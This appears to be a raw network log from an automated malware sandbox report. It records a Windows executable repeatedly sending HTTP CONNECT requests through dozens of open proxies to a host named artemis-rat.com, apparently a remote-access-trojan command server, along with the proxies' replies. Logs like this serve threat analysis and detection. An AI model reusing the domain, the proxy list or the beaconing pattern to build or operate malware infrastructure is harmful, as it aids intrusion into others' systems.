                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.799374104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1232192.168.2.552668103.234.24.4056783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.799434900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1233192.168.2.552620199.58.185.941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.799709082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1234192.168.2.55335747.74.226.850013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.800873995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1235192.168.2.55166051.75.126.150218033876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.816921949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889527082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1236192.168.2.551802162.240.208.98437043876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.821397066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.905116081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.014455080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.014434099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1237192.168.2.55336340.76.160.14390023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.824562073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1238192.168.2.553383104.27.15.161803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.839365005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.993866920 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1239192.168.2.553321102.132.48.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.851943970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1240192.168.2.55338123.94.123.24388883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.863640070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.306781054 CET84INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1241192.168.2.55335927.65.240.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.869158983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1242192.168.2.553360178.54.21.20380813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.871706009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.701857090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1243192.168.2.55239172.49.49.11310343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.874386072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1244192.168.2.552303107.181.168.14541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.876450062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1245192.168.2.55336245.11.95.16550383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.899164915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1246192.168.2.55340912.186.205.123803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.910800934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.101475000 CET325INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1247192.168.2.551792162.214.121.173335723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.917449951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.998730898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.999154091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.998853922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1248192.168.2.55340823.95.209.142156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.917669058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1249192.168.2.55274792.204.136.149169283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.931924105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.998688936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.999159098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.998856068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1250192.168.2.55276651.161.33.206445233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.004473925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1251192.168.2.553368115.146.225.137100463876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.005147934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1252192.168.2.553366185.49.30.580813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.005398989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1253192.168.2.55336436.92.81.18141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.005708933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1254192.168.2.55340620.210.113.3281233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.008781910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.273838043 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1255192.168.2.55336138.54.116.931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.010121107 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.434178114 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1256192.168.2.55341338.162.31.931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.011320114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.422396898 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1257192.168.2.553393212.110.188.202344093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.011710882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.701946974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.064862967 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1258192.168.2.55337545.159.189.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.012077093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
